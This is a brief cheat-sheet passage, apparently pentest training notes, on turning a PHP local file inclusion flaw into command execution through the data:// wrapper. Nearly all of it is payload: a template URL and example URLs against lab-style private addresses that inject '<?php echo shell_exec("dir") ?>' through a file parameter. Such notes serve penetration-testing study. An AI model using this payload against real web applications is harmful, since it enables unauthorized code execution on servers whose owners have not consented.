PHP Wrappers

Instead of a url/path to a file, we can try to include PHP Wrappers, like so:

http://10.11.0.22/menu.php?file=data:text/plain,hello world

Here's how we can obtain the command execution using this method:

<vuln_url>/<vuln_path>?<vuln_param>=data:text/plain,<?php echo shell_exec("dir") ?>

e.g.:

http://10.10.0.2/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>